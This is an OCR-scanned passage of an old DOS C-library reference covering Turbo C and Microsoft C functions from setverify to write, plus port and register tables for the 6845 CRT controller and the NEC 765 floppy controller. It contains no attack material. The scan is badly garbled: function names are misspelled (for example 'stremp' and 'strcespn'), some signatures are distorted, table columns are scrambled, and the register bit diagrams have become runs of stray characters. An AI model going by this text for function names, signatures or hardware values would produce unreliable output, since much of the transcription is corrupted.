- address of a C routine may be used only if it has been 


declared to be an interrupt routine. Ex: 


Avoid interrupt func( void ); 
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- MS C uses — dos_setvect-() 
- see -INT 21,25- 

:setverify 

ATC: int setverify( int value ) 


- prototype in dos.h 


- sets state of verify flag (0==off, 
- no corresponding MS C function 
- see -INT 21,2E- 

:_setvideomode 


1==zon) to value 


AMSC: short far _setvideomode( short mode ) 


- prototype in graph.h 


- sets video mode specified 

- mode= _DEFAULTMODE 
_MAXCOLORMODE 
_MAXRESMODE graphics mode with 
_TEXTBW40 40x25 
_TEXTC40 40x25 
_TEXTBW80 80x25 
_TEXTC80 80x25 
_MRESA4COLOR 320x200 4 color 
_MRESNOCOLOR 320x200 4 
_HRESBW 640x200 2 
_TEXTMONO 80x25 
_MRES16COLOR 320x200 16 
_HRES16COLOR 640x200 16 
_ERESNOCOLOR 640x350 al 
_ERESCOLOR 640x350 64 color 
_VRES2COLOR 640x480 2 color 
_VRES16COLOR 640x480 16 
_MRES256COLOR 320x200 256 
_ORESCOLOR 640x400 16 color 
_HERCMONO 720x348 2 color 


- returns non-zero on SUCccess; 
:_Ssetviewport 


AMSC: void far _setviewport( short x1, 


- prototype in graph.h 


16 color 
16 color 
16 shades CGA/Text 
16 color 


mono 


short y1, 


hardware default 
graphics mode with most colors 


highest resolution 
CGA/Text 
CGA/Text 


CGA/Text 
CGA/Graphics 

color  CGA/Graphics 

color CGA/Graphics 

MDA/Text 

EGA/Graphics 

color EGA/Graphics 

color EGA/Text 
EGA/Graphics 
VGA/Graphics 

color VGA/Graphics 

color VGA/Graphics 
CGA/Graphics/Olivetti 
HGC/Graphics/Hercules 


color 


zero on error 


short x2, short y2 ) 


- defines a clipping region like - setcliprgn-() 
- sets the logical origin to the upper left corner coordinates 


specified as parameters 


- (x1,y1) upper left corner of window 
- (x2,y2) lower right corner of window 


:_setvisualpage 
AMSC: short far _setvisualpage( short page ) 
- prototype in graph.h 


- sets visual page to that specified 
- default page is zero 


- returns previous page number or a negative value on error 


:sin 
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Adouble sin( double x ) 


- prototype in math.h 


- returns sine of x 
- x must be in radians 


:sinh 
Adouble sinh( double x ) 


- prototype in math.h 


- returns hyperbolic sine of x 
- x must be in radians 


:sleep 
ATC: void sleep( unsigned seconds ) 


- prototype in dos.h 


- suspended program for seconds of time 
- accurate in seconds to limit of MS-DOS clock 
- no corresponding MS C function 


:sopen 
NAint sopen( const char *path, int access, int shflag, int mode ) 


- prototype in io.h, also include share.h, stat.h & fentl.h 


- actually a macro defined: open( path, (access | shflag), mode ) 
- opens file "path" and prepares it for shared I/0 

- sharing mode is determined using access, shflag and mode 

- access is a combination of the following ("permis" follows): 


% Read/Write Access Flags (mutually exclusive): 
O_RDONLY open read only 
O_WRONLY open write only 


O_RDWR open read/write 
% Other Access Mode Flags: 
O_APPEND file pointer is placed at EOF before each write 
O_CREAT if file doesn't exist, create with "permis" attributes 
O_TRUNC if exists, truncate length to zero, but leave file 


attributes unchanged 
O_BINARY binary mode 


O_TEXT text mode 
O_EXCL used with O_CREAT, error occurs if file already exists 
O_NDELAY UNIX only 
% Permission Attributes (if creating): 
S_IWRITE write permission 
S_IREAD read permission 


S_IREAD | S_IWRITE read/write permission 


- if O BINARY nor O_TEXT is given, file is opened in translation 
mode (O_TEXT) given by global variable _fmode 
- returns non-negative number as file handle, or -1 on error 
:Spawn:Spawn... 
AFunction spawn(), etc... 
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in 
in 
in 
in 
in 
in 
in 
in 


:_Splitp 
% MS 
% 


t spawnl( int mode, char *path, char *argo, 
char *argi, ..., NULL ) 
t spawnle( int mode, char *path, char *argo, 
char *arg1, ..., NULL, char *envp[] ) 
t spawnlp( int mode, char *path, char *argo, 
char *argi, ..., NULL ) 
t spawnlpe( int mode, char *path, char *argo, 
char *arg1, ..., NULL, char *envp[] ) 
t spawnv( int mode, char *path, char *argv ) 
t spawnve( int mode, char *path, char *argv, char *envp[] ) 
t spawnvp( int mode, char *path, char *argv ) 
t spawnvpe( int mode, char *path, char *argv, char *envp[] ) 


prototype in process.h 


creates & runs child processes 

mode is P_WAIT which puts parent process "on hold" until child 
completes execution; P_NOWAIT which continues to run parent 

while child runs (not supported yet); or P_OVERLAY which overlays 
child in memory location formerly occupied by parent (same as 
exec... call) 

use P_WAIT to perform a DOS shell 

returns 0 for SUCCESS and non-zero for failure based on the 
errorlevel set by the application 


see -—exec...- 
ath 
C: void splitpath( char *path, char *drive, char *dir, 


char *fname, char *ext ) 
prototype in stdlib.h 


dissects the path into components 

path = fully qualified file name to dissect 

drive = is the drive letter followed by a colon if drive was 
specified in string 

dir = any directories included in "path" plus '\'! 

fname = base filename w/o extension 

ext = file extension 

the maximum size of each component is: _MAX_ DRIVE, _MAX_DIR, 


_MAX_FNAME, _MAX_EXT (all include the NULL and are actually 


:sprintf 
Nint spr 


‘sqrt 
Adouble 


:srand 


much larger than needed, except _MAX DRIVE is exact fit) 
see - makepath-() 


intf( char *s, const char *format [, argi1, arg2, ...] ) 


prototype in stdio.h 


prints formatted data into string s 


see -PRINTF SPEC- for format specifiers 


sqrt( double x ) 


prototype in math.h 


returns square root of x, or 0 on error 
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Avoid srand( unsigned seed ) 


- prototype in stdlib.h 


- re-initializes the random number generator with seed 
- see -rand-() 
:sscanf 
Aint sscanf( const char *s, const char *format, argi1, arg2, ... ) 


- prototype in stdio.h 


- see -scanf-() and -SCANF SPECS- 
:ssignal 
Aint (*ssignal( int sig, int (*action)))) (void) 


- prototype in signal.h 


- ssignal() and -gsignal-() implement a software-signaling facility 
where software signals are integers 1-15 

- ssignal() establishes an action routine for servicing a signal 
where sig is associated with the action routine 

- ssignal() returns action previously established for ssignal() 
or SIG_DFL 

- UNIX based 


:stackavail 
AMSC: size_t stackavail( void ) 


- prototype in malloc.h 


- used to determine approximate memory available on the stack for 
allocation via -alloca-() 
- returns approximate memory available on the stack 
‘istat 
% int stat( char *pathname, struct stat *buff ) 
% int fstat( char *handle, struct stat *buff ) 


- prototype in stat.h 


- stat() and -fstat-() store information about a given open file 
(or directory) in the stat structure (in stat.h) 

- stat() gets information about the open file or directory, while 
fstat() gets info about the open file associated with handle 

- returns 0 if successful, else -1 on error 


:_status87 
Aunsigned int _status87( void ) 


- prototype in float.h 


- returns floating-point status word & other conditions detected 
by 8087/80287 exception handler 
- see — clear87-() -_control87-() (float.h also) 
:stime 
Aint stime( time_t *tp ) 
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- prototype in time.h 


- sets system time & date, where tp to value of time in seconds 
since 00:00:00 GMT Jan 1, 1970 


:str...:Strings 
AString Manipulation Functions 


- prototype in string.h (a few also exist in stdlib.h) 


% Conversion: 
char *-strlwr-( char *s ) 
char *-strrev-( char *s ) 
double -strtod-( const char *s, char **endptr ) 
long -strtol-( const char *s, char **endptr, int radix ) 
unsigned long -strtoul-( const char *s, char **endptr, int radix ) 
char *-strupr-( char *s ) 
char *-strdup-( const char *s ) 


% Search: 
char *-strchr-( char *s, int c ) 
size_t -strcespn-( const char *s1, const char *s2 ) 
char *-strpbrk-( const char *s1, const char *s2 ) 
char *-strrchr-( const char *s, int c ) 
size_t -strspn-( const char *s1, const char *s2 ) 
char *-strstr-( const char *s1, const char *s2 ) 
char *-strtok-( char *s1, const char *s2 ) 


% Comparison: 
int -stremp-( const char *s1, const char *s2 ) 
int -strempi-( const char *s1, const char *s2 ) 
int -stricmp-( const char *s1, const char *s2 ) 
int -strncemp-( const char *s1, const char *s2, size_t maxlen ) 
int -strncmpi-( const char *s1, const char *s2, size t maxlen ) 
int -strnicmp-( const char *s1, const char *s2, size _ t maxlen ) 


% Copy: 
char *-stpcpy-( char *dest, const char *src ) 
char *-strcpy-( char *dest, const char *src ) 
char *-strcat-( char *dest, const char *src ) 
char *-strncat-( char *dest, const char *src, size_t maxlen ) 
char *-strncpy-( char *dest, const char *src, size_t maxlen ) 


% Miscellaneous: 
size_t -strlen-( const char *s ) 
char *-strnset-( char *s, int ch, size _ t n ) 
char *-strset-( char *s, int ch ) 
char *-strerror-( int errnum ) 
char *- strerror-( const char *s ) 


:stpcpy 
Achar *stpcpy( char *dest, const char *src ) 


- prototype in string.h 
- copies src into dest 


- returns dest+-strlen-(src) 
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:strcat 

Achar *strcat( char *dest, const char *src ) 
- prototype in string.h 
- appends src to dest 

:strchr 

Achar *strchr( const char *str, int c ) 
- prototype in string.h 


- scans str for first occurrence of c 
- returns pointer to c in str, or NULL if not found 


:strcemp 
NAint stremp( const char *str1, const char *str2 ) 
- prototype in string.h 
- compares str1 to str2 
- returns < 0 if str1 < str2, = 0 if str1 = str2, or > 0 
if str1 > str2, using a signed comparison 
:strcpy 
Achar *strcpy( char *dest, const char *src ) 


- prototype in string.h 


- copies src into dest 
- returns dest 


:strcespn 
Asize_t strespn( const char *str1, const char *str2 ) 
- prototype in string.h 


- returns length of initial segment of str1 that consists 
entirely of characters NOT from str2 


:_Strdate:_strtime 
% MSC: char *_strdate( char *date ) 
% MSC: char *_strtime( char *time ) 


- prototype in time.h 


- date formatted date string: mm/dd/yy (9 bytes inc NULL) 
- time formatted time string: hh:mm:ss (9 bytes inc NULL) 
- returns pointer to the parameter string 


- Turbo C uses -strdate-() and -strtime-() 
:strdup 
Achar *strdup( const char *str ) 

- prototype in string.h 
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duplicates str, getting space with a call to -malloc-() 
returns pointer to duplicated string, or NULL if space could not 
be allocated 


:_Strerror 
AMSC: char *_strerror( char *string ) 


prototype in string.h 


creates an error message based on the user supplied string 
followed by a colon, then the library error message 

string = user error message string 

returns pointer to the generated string 

does not print the string 


:strerror 
Achar *strerror( char *str ) 


prototype in string.h 


str should contain your customized error message to which a system 
error message will be appended 

allows you to generate customized error messages, returning a 
pointer to a null-terminated string containing an error message 
if str is NULL, the return value contains the most recently 
generated system error message; this string is null-terminated 
if str is not NULL, the return value contains, a colon, a space, 
the most recently generated system error message, and a newline; 
with length of str being 94 characters or less 

this function generates the error string but does NOT print it 
for accurate error-handling, strerror should be called as soon 
as a library routine generates an error return 


:stricmp 
Aint stricmp( const char *str1, const char *str2 ) 


:strlen 
Nsize_t 


:strlwr 


prototype in string.h 
compares str1 to str2 without case sensitivity 
returns < 0 if str1< str2 

= 0 if str1 = str2 

> 0 if str1 > str2 


using a signed comparison 


strlen( const char *str ) 


prototype in string.h 


returns number of characters in str, not counting the null 
terminating character 


Achar *strlwr( char *str ) 
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- prototype in string.h 
- converts str to all lower case 

:strncat 

Achar *strncat( char *dest, const char *src, size_t maxlen ) 
- prototype in string.h 


- appends up to maxlen characters of src to dest and then 
appends a null character 


:strncmp 
Aint strnemp( const char *str1, const char *str2, size_t maxlen ) 
- prototype in string.h 
- compares str1 to str2 up to maxlen characters 
- returns < 0 if str1< str2 
= 0 if str1 = str2 
> 0 if str1 > str2 
using a signed comparison 
:strncpy 
Achar *strncpy( char *dest, const char *src, size_t maxlen ) 
- prototype in string.h 
- copies exactly maxlen characters from src to dest, truncating 


or null-padding dest 
- dest might NOT be null-terminated if length of src >= maxlen 


:strnicmp 
Aint strnicmp( const char *str1, const char *str2, size t maxlen ) 
- prototype in string.h 
- compares str1 to str2 up to maxlen chars ignoring case 
- returns < 0 if str1 < str2 
= 0 if str1 = str2 
> 0 if str1 > str2 
using a signed comparison 
:strnset 
Achar *strnset( char *str, int ch, size _t n ) 
- prototype in string.h 


- sets up to first n bytes of str to ch 
- if n > -strlen-(str) then strlen(str) replaces n 


:strpbrk 
Achar *strpbrk( const char *str1, const char *str2 ) 
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- prototype in string.h 


- scans str1 for first occurrence of any character appearing in str2 
- returns pointer to first occurrence; NULL if not found 


:strrchr 
Achar *strrchr( const char *str, int c ) 
- prototype in string.h 
- scans a string in reverse direction for specified character c 
- strrchr finds the LAST occurrence of c in str 
- returns pointer to LAST occurrence, or NULL if not found 
:strrev 
Achar *strrev( char *str ) 
- prototype in string.h 
- reverses all characters in str, except null terminator 
:strset 
Achar *strset( char *str, int ch ) 
- prototype in string.h 
- sets all characters in str to ch 
:strspn 
Asize_t strspn( const char *str1, const char *str2 ) 
- prototype in string.h 


- returns length of initial segment of str1 that consists 
entirely of characters from str2 


:istrstr 
Achar *strstr( const char *anchor, const char *testpattern ) 


- prototype in string.h 


- returns a pointer within anchor where testpattern is found, 
or NULL if testpattern is not found in anchor 
- may be incompatible with Microsoft C 


:strtod 
Adouble strtod( const char *str, char **endptr ) 


- prototype in string.h 
- converts string str to a double value 
- stops reading at tfirst character that cannot be interpreted 


as part of a double value, returning in *endptr 
- str must have format: 
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[ws][sn][ddd][.][ddd][fmt[sn]ddd] 


where [ws] = optional whitespace 
[sn] = optional sign (+-) 
[ddd] = optional digits 
[fmt] = option e or E 
[.] = optional decimal point 


:strtok 
Achar *strtok( char *str1, const char *str2 ) 


- prototype in string.h 


- parses str1 for tokens and separators, where separators are 
defined in str2 

- first call returns a pointer to the first character of the first 
token in str1 and writes a null character into str1 immediately 
following the returned token; subsequent calls with NULL for 
the first argument will work through the string stri in this way 
until no tokens remain 

- when tokens are exhausted, returns NULL 


:strtol:strtoul 
% long strtol( const char *str, char **endptr, int base ) 
% unsigned long strtoul( const char *s, char **endptr, int radix ) 


- prototype in string.h 

- converts string str to long (or unsigned long) value 

- stops reading at first character that cannot be interpreted 
as part of a long value, returning in *endptr 

- str must have format: 


[ws][sn][®][x][ddd] 


where [ws] = optional whitespace 
[sn] = optional sign (+-) 
[0] = optional zero 
[X] = optional x or X 
[ddd] = optional digits 


- base is between 2 and 36; if 0, first few characters of str 
determines base to be used (oct,hex or dec) any other value 
of base is illegal 

:strupr 
Achar *strupr( char *str ) 


- prototype in string.h 
- converts to all uppercase 
: swab 
Avoid swab( char *src, char *dest, int nbytes ) 
- prototype in stdlib.h 
- copies nbytes bytes from src into dest, with adjacent even and 
odd-byte positions being swapped 
- nbytes should therefore be an even number 


- a standard way of performing this is to use the -XCHG- instruction 
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‘system 


NAint system( const char *command ) 


tan 
NAdouble 


:tanh 
Adouble 


prototype in stdlib.h 

invokes MS-DOS COMMAND.COM to execute "command", returning exit 
status of COMMAND.COM; the COMSPEC environment variable is 
automatically searched if necessary 

a CR/LF pair in the command string will result in an error 

see -exec...-  —Spawn...- 


tan( double x ) 


prototype in math.h 
returns tangent of x 
x must be in radians 


tanh( double x ) 


prototype in math.h 


returns hyperbolic tangent of x 
x must be in radians 


Along tell( int handle ) 


prototype in io.h 


returns offset within file corresponding to handle 
returns -1L on error 


see -lseek-() 


:tempnam: tmpnam 


% 
% 


:time 
Atime_t 


MSC: char *tempnam( char *dir, char *prefix ) 
MSC: char *tmpnam( char *string ) 


prototype in stdio.h 


string = buffer to receive temporary filename 

tempnam() creates a temporary file in the specified directory 
"dir" using the "prefix" as the beginning of the filename; 
memory for the resulting filename is allocate via -malloc-() and 
must be freed with -free-() 

tmpnam() creates the temporary file in the current directory 
return a pointer to the new name or NULL on error 


time( time_t *tloc ) 


prototype in time.h 


gives current time in seconds elapsed since 00:00:00 GMT, 
January 1, 1970, and stores it into tloc 
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:tmpfile 
AMSC: FILE *tmpfile( void ) 
- prototype in stdio.h 
- creates and opens a temporary stream file 
- returns stream pointer or NULL on error 
- file is automatically deleted when closed or rmtmp() is called 
- -rmtmp-() works only if in original directory 
- file is opened in binary write mode; except MS C version 4.0 
opened file in write translate mode 
:toascii 
Aint toascii( int c ) 
- prototype in ctype.h 
- clears all but lower 7 bits in c, converting to ASCII 
:_tolower 
Aint _tolower( int c ) 


- prototype in ctype.h 


- converts c to lowercase if c is UPPER case 
- use -tolower-() preferentially 


:tolower 
Aint tolower( int c ) 
- prototype in ctype.h 
- converts c to LOWER case only if c is UPPER case 
:_toupper 
Aint _toupper( int c ) 
- prototype in ctype.h 


- converts c to UPPER case only if c is LOWER case 
- use -toupper-() preferentially 


: toupper 
Aint toupper( int c ) 
- prototype in ctype.h 
- converts c to UPPER case only if c is LOWER case 
:tzset 
Avoid tzset( void ) 
- prototype in time.h 


- included for UNIX compatibility but does nothing in DOS 
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:ultoa 
Achar *ultoa( unsigned long value, char *string, int radix ) 


- prototype in stdlib.h 


- converts value to string where radix specifies base 
(2-36) for conversion 


:umask 
AMSC: int umask( int permission ) 


- prototype in io.h, sys\types.h, sys\stat.h 


- changes permision in which a file may be accessed 

- permission = S_IWRITE write is forbidden 

S_IREAD read is forbidden (ignored by DOS) 
S_IWRITE | S_IREAD no reading or writing 


- returns previous permission value 
‘ungetc 
Aint ungetc( int c, FILE *fp ) 

- prototype in stdio.h 

- pushes character "c" back into file stream "fp" 
:ungetch 
Avoid ungetch( int c ) 

- prototype in conio.h 

- similar to -ungetc-() except pushes character back to keyboard buffer 
:unixtodos 
% TC: void unixtodos( long utime, struct date *dateptr, 
% struct time *timeptr) 

- prototype in dos.h 


- converts date & time to DOS format 
- no corresponding MS C function 


:unlink 
Aint unlink( const char *filename ) 
- prototype in dos.h or io.h 


- returns 0 if successful, else -1 
- attempts to delete an open file may damage the file system 


‘unlock 
ATC: int unlock( int handle, long offset, long length ) 


- prototype in io.h 
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- unlock() removes locks placed on a file region by lock() 
- returns 0 on success, else -1 on error 
- all locks must be released before program termination 
- MS C uses -locking-() 
- see -lock C- 
:utime 
AMSC: int utime( char *path, struct utimbuf *times ) 


- prototype in sys\types.h, sys\utime.h 


- path = any valid DOS filename 

- times = time values in structure (modtime should be set) 

- if write access to the file is available the file time is updated 
from the modtime field 

- if times is NULL the file date is set to current time 

- returns 0 on success or -1 on error 


struct utimbuf 


time_t actime; - access time (not used in DOS) 
time_t modtime; - modification time 
}; 

:vfprintf 


Aint vfprintf( FILE *stream, const char *format, va_list param ) 


- prototype in stdio.h 
- sends formatted output to a stream 

:vfscanf 

Aint vfscanf( FILE *stream, const char *format, va_list argp ) 
- prototype in stdio.h 


- like -fscanf-(), except arguments accepted from va_arg array from 
va_list parm 


:vprintf 

Aint vprintf( const char *format, va_list param ) 
- prototype in stdio.h 
- sends formatted output to stdout 

:vscanf 

Aint vscanf( const char *format, va_list argp ) 
- prototype in stdio.h 


- like -scanf-(), except arguments accepted from va_arg array from 
va_list parm 


:vsprintf 
Aint vsprintf( char *string, const char *format, va_list param ) 
- prototype in stdio.h 
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- sends formatted output to a string 


:vsscanf 
% int vsscanf( const char *string, const char *format, va_list argp ) 


- prototype in stdio.h 
- like -sscanf-(), except arguments accepted from va_list parm 


:_wrapon 
AMSC: short far _wrapon( short wrap ) 


- prototype in graph.h 


- sets wrapping/truncating of text 
- wrap = _GWRAPOFF truncates text at window border 
= _GWRAPON wraps line at window border 


- returns previous wrap value 


:_write 
ATC: int _write( int handle, char *buf, int count ) 


- prototype in io.h 


- writes "count" bytes from "buf" to file or device at "handle" 
- count cannot be greater that 65534 

- is a direct call to MS-DOS write function -INT 21,40- 

- does NO conversion of CR/LFs; all output is binary 

- returns a count of bytes written or -1 on error 

- MS C uses — dos_write-() 


- see -write-() — open-() -— creat-() —_read-() 


‘write 
NAint write( int handle, char *buf, int count ) 


- prototype in io.h 


- writes "count" bytes from "buf" to file or device at "handle" 
- converts LF to CR-LF for text output 
- returns a count of bytes written (excluding any CRs 
generated for a text file), or -1 on error 
:stdarg:va_start:va_end:va_list 
AExample of variable arguments in C 


void myprintf( char *format, ... ) 
va_list argptr; 
va_start ( argptr, format ); 
vsprintf ( text, format, argptr ); 
va_end ( argptr ); 


write (1, text, strlen (text)); 
} 
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@Hardware Data and Specifications 
16845: CRTC 
A6845 - Motorola CRT Controller 


3B0-3BB Monochrome Monitor Adapter 
3D0-3DC Color Graphics Adapter (mapped similarly) 


3B0/3DO port address decodes to 3B4/3D4 
3B1/3D1 port address decodes to 3B5/3D5 
3B2/3D2 port address decodes to 3B4/3D4 
3B3/3D3 port address decodes to 3B5/3D5 
3B4/3D4 6845 index register, selects which register [0-11h] 
is to be accessed through port 3B5/3D5 
3B5/3D5 6845 data register [0-11h] selected by port 3B4/3DA, 
registers 0C-0F may be read. If a read occurs 
without the adapter installed, FFh is returned. 
3B6/3D6 port address decodes to 3B4/3D4 
3B7/3D7 port address decodes to 3B5/3D5 
3B8/3D8 6845 mode control register 
3B9/3D9 color select register on color adapter 
3BA/3DA status register (read only) 
3BB/3DB light pen strobe reset 
3DC preset light pen latch 
3DF CRT/CPU page register (PCjr only) 


% Registers: Accessed through ports 3B5 & 3D5 VALID VALUES 

% MONO C040 C080 GRPH 
00 - Horiz. total characters 61 38 71 38 
01 - Horiz. displayed characters per line 50 28 50 28 
02 - Horiz. synch position 52 2D 5A 2D 
03 - Horiz. synch width in characters OF OA 0A 0A 
04 - Vert. total lines 19 1F 1F 7F 
05 - Vert. total adjust (scan lines) 06 06 06 06 
06 - Vert. displayed rows 19 19 19 64 
07 - Vert. synch position (character rows) 19 1C 1C 70 
08 - Interlace mode 02 02 02 02 
09 - Maximum scan line address OD 07 07 01 
OA - Cursor start (scan line) 0B 06 06 06 
©B - Cursor end (scan line) OC 07 07 07 
OC - Start address (MSB) 00 00 00 00 
OD - Start address (LSB) 00 00 00 00 
OE - Cursor address (MSB) (read/write) 00 -- -- -- 
OF - Cursor address (LSB) (read/write) 00 -- -- -- 


10 - Light pen (MSB) (read only) -- -- -- -- 
11 - Light pen (LSB) (read only) -- -- -- -- 


- Registers 00-0D are write only, registers 0E-0F are read/write and 
registers 10-11 are read only 
- Cursor address is calculated with using the following (row*80)+col 


NA6845 - Port 3B8 (Monochrome) 


373 


63534333231303 3B8 CRT Control Port 

3 3 3 3 3 3 AAAAA 1 = 80x25 text 

dae ARI URISEA 

3 s 3 AAAAAAAAA 1 = enable video signal 
3 3 ARAAAAAAAA Unused 

ì \ARAAAARAAA 1 =" pi iningon 
\AARARAAARARAA Unused 


7 
3 
3 
3 
3 
3 


A6845 - Port 3D8 (Color) 
37363534333231303 3D8 Mode Select Register 
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3 3 3 AAAAA 1 = 80x25 text, 0 = 40x25 text 
3 3 AAAAAA 1 = 320x200 graphics, 0 = text 
MINNA EB Et 

AAAAAAAA 1 = enable video signal 
AAAAAAAAA 1 = 640x200 B/W graphics 
VU = blink. 0. fig Dime 


NA6845 - Port 3D9 Color Text Modes 


37363534333231303 3D9 Color Select Register (3B9 not used) 
3 3 s 3 3 AAAAAAAAA screen/border RGB 

3 s 3 3 AAAAAAAAAA select intensity setting 

3 3 3 AAAAAAAAAAA background intensity 

AAAAAAAAAAAAAAKA unused 


N6845 - Port 3D9 Color Graphics Modes 
37363534333231303 3D9 Color Select Register (3B9 not used) 
3 s 3 s 3 AAAAAAAAA RGB for background 

3 s 3 3 AAAAAAAAKA intensity 

3 3 3 AAAAAAAAAAA unused 

3 3 AAAAAAAAAAAA 1 = palette 1, O=palette 0 (see below) 

AAAAAAAAAAAAAAA unused 


Palette 0 
Palette 1 


green, red, brown 
cyan, magenta, white 


A6845 - Port 3DA Status Register 


534333231303 3DA Status Register 

3 3 3 3 3 AAAAA 1 = display enable, RAM access is 0K 

3 s 3 3 AAAAAA 1 = light pen trigger set 

3 s 3 AAAAAAA © = light pen on, 1 = light pen off 

3 3 AAAAAAAA 1 = vertical retrace, RAM access 0K for next 1.25ms 
AAAAAAAAKAAAKAAAA unused 

:765:FDC:NEC 765:8272:floppy controller 

ANEC ®PD765 - Floppy Disk Controller - 8272A 


% PS/2 FDC Diskette Status Register A at 3FOh 


37363 


534333231303 3FOh PS/2 Disk Status Register A (read-only) 
3 3 3 3 3 AAAAA direction 

3 s 3 3 AAAAAA write protect 

3 3 3 ARAAAAA index 

3 3 AAAAAAAA head 1 select 

3 AAAAAAARA track 0 

AAAAAAAAAA step 

AAAAAAAAAAA second drive installed 

AAAAAAAAAAAKA interrupt pending 


736 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


% PS/2 FDC Diskette Status Register B at 3F1ih 


37363 


534333231303 3F1h PS/2 Disk Status Register B (read-only) 

3 3 3 3 3 AAAAA motor enable 0 

3 3 s 3 AAAAA motor enable 1 

3 3 3 AAAAA write enable 

3 3 AAAAA read data (toggles w/positive transition in -RD DATA) 
3 AAAAA write data (toggles w/positive transition in WR DATA) 
AAAAA drive select 

AAAAAAA reserved 


736 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 


% FDC Digital Output Register at 3F2h (all systems) 
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% 


% 


% 
% 


% 


6353433323130? port 3F2h (write only) 

3 3 3 3 3 AAAAAAA floppy drive select (0=A, 1=B, 2=floppy C, 

3 3 3 3 AAAAAAAA 1 = FDC enable, 0 = hold FDC at reset 

3 3 3 AAAAAAAAA 1 = DMA & I/0 interface enabled (reserved PS/2) 
3 3 AAAAAAAAAA 1 = turn floppy drive A motor on 

3 AAAAAAAAAKA 1 = turn floppy drive B motor on 

AAAAAAAAAAAA 1 = turn floppy drive C motor on; (reserved PS/2) 
AAAAAAAAAAAAA 1 = turn floppy drive D motor on; (reserved PS/2) 


- used to control drive motors, drive selection, and feature enable 
- PS/2 only uses bit 0 for floppy drive select; bit 1 is reserved 

- PS/2 only uses bits 5 & 4 for motor enable; bits 7&6 are reserved 
- all DOR bits are cleared during controller reset 


FDC Main Status Register at 3F4h (all systems) 


37363 


534333231303 port 3F4h (read only) 

3 3 s 3 3 AAAAA floppy drive 0 in seek mode/busy 

3 3 3 3 AAAAAA floppy drive 1 in seek mode/busy 

3 3 3 AAAAAAA floppy drive 2 in seek mode/busy (reserved PS/2) 
3 3 AAAAAAAA floppy drive 3 in seek mode/busy (reserved PS/2) 
3 AAAAAAAAA FDC read or write command in progress 

AAAAAAAAAA FDC is in non-DMA mode 

AAAAAAAAAKA 1/0 direction; 1 = FDC to CPU; 0 = CPU to FDC 


736 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


AAAAAAAAAAAA data reg ready for I/0 to/from CPU (request for master) 


FDC Command Status Register 0 at 3F5h (all systems) 


373 


6353433323130? Command Status Register 0 at port 3F5h 

3 3 3 3 3 AAAAAAA unit selected at interrupt (0=A, 1=B, 2=...) 
3 3 s 3 AAAAAAAA head number at interrupt (head 0 or 1) 

3 3 3 AAAAAAAAA not ready on read/write or SS access to head 1 
3 3 AAAAAAAAAA equipment check (see note) 

3 AAAAAAAAAKA set to 1 when FDD completes a seek command 
AAAAAAAAAAAAAKA last command status (see below) 


7 
3 
3 
3 
3 
3 


76 Last Command Status 

00 command terminated successfully 

01 command execution started but terminated abnormally 

10 invalid command issued 

11 command terminated abnormally due to a change in state of 
the Ready Signal from the FDC (reserved on PS/2) 


- equipment check can occur if FDD signals a fault or track zero is 
not found after 77 steps on a recalibrate command 
- PS/2 only uses bits 1-0 for drive (values are 01b and 10b) 


FDC Command Status Register 1 at 3F5h (all systems) 


37363 


534333231303 Command Status Register 1 at port 3F5h 

3 3 s 3 3 AAAAA FDC cannot find ID address mark (see reg 2) 
3 3 s 3 AAAAAA write protect detected during write 

3 3 3 AAAAAAA FDC cannot find sector ID 

3 3 AAAAAAAA unused (always zero) 

3 AAAAAAAAA over-run; FDC not serviced in reasonable time 
AAAAAAAAAA data error (CRC) in ID field or data field 
AAAAAAAAAAA unused (always zero) 

AAAAAAAAAAAA end of cylinder; sector# greater than sectors/track 


736 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


- bit 0 of Status Register 1 and bit 4 of Status Register 2 are 
related and mimic each other 
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% FDC Command Status Register 2 at 3F5h (all systems) 


37363 


534333231303 Command Status Register 2 at port 3F5h 

3 3 3 3 3 AAAAA missing address mark in data field 

3 3 s 3 AAAAAA bad cylinder, ID not found and Cyl Id=FFh 

3 3 s AAAAAAA scan command failed, sector not found in cylinder 
3 3 AAAAAAAA scan command equal condition satisfied 

3 AAAAAAAAA wrong cylinder detected 

AAAAAAAAAA CRC error detected in sector data 

AAAAAAAAAKA sector with deleted data address mark detected 
AAAAAAAAAAAA unused (always zero) 


736 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


- bit 0 of Status Register 1 and bit 4 of Status Register 2 are 
related and mimic each other 


% FDC Command Status Register 3 at 3F5h (FDD status, all systems) 
37363534333231303 Floppy Disk Drive Status at port 3F5h 
3 3 3 3 3 s AAAAAAA FDD unit selected status (0=A, 1=B, 2=. 
3 3 s 3 3 AAAAAAAA FDD side head select status (0O=head 0, 1= head 1) 
3 3 s 3 AAAAAAAAA FDD two sided status signal 
3 s 3 AAAAAAAAAA FDD track zero status signal 
3 3 AAAAAAAAAAA FDD ready status signal 
3 


AAAAAAAAAAAA FDD write protect status signal 
AAAAAAAAAAAAA FDD fault status signal 


% PS/2 FDC Digital Input Register at 3F7h 


37363534333231303 3F7h PS/2 Digital Input Register (read only) 
3 3 3 3 3 s 3 AAAA high density select 

3 AAAAAAAKAAAAAKA reserved 

AAAAAAAAAAAAAAAA diskette change 


% PS/2 FDC Configuration Control Register at 3F7h 
37363534333231303 3F7h PS/2 Config. Control Register (write only) 


3 3 3 s 3 3 AAAAA DRC1, DRCO (see below) 
AAAAAAAAAAAAAAAA reserved 


DRC1 DRCO 
(0) (0) 500000 bit per second mode 
(0) 1 reserved 
1 (0) 250000 bit per second mode 
1 1 reserved 


- Digital Input Register is used to sense the state of the 
(-diskette change) and the (-high density select) signals 
- Configuration Control Register is used to set the transfer rate 


AFDC Programming Considerations 
% Three phases of command execution: 


1. Command phase; commands are sent from the CPU to the FDC via 
port 3F5h; bit 6 of the Status Register at 3F4h must be zero 

2. Execution phase; FDC executes instruction & generates INT 6 

3. Result phase; status and other information is available to CPU; 
INT 6 sets bit 7 of BIOS Data Area location 40:3E which can 
be polled for completion status 
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% Example of a read operation: 


DUIDSDWNHE 


turn disk motor on and set delay time for drive spin up 
perform seek operation; wait for disk interrupt 

prepare DMA chip to move data to memory 

send read command and wait for transfer complete interrupt 
read status information 

turn disk motor off 


AFloppy Diskette Controller Operations (15 commands) 


% Read Data 


command 
command 
command 
command 
command 
command 
command 
command 
command 
result 
result 
result 
result 
result 
result 
result 


% Read De 


command 
command 
command 
command 
command 
command 
command 
command 
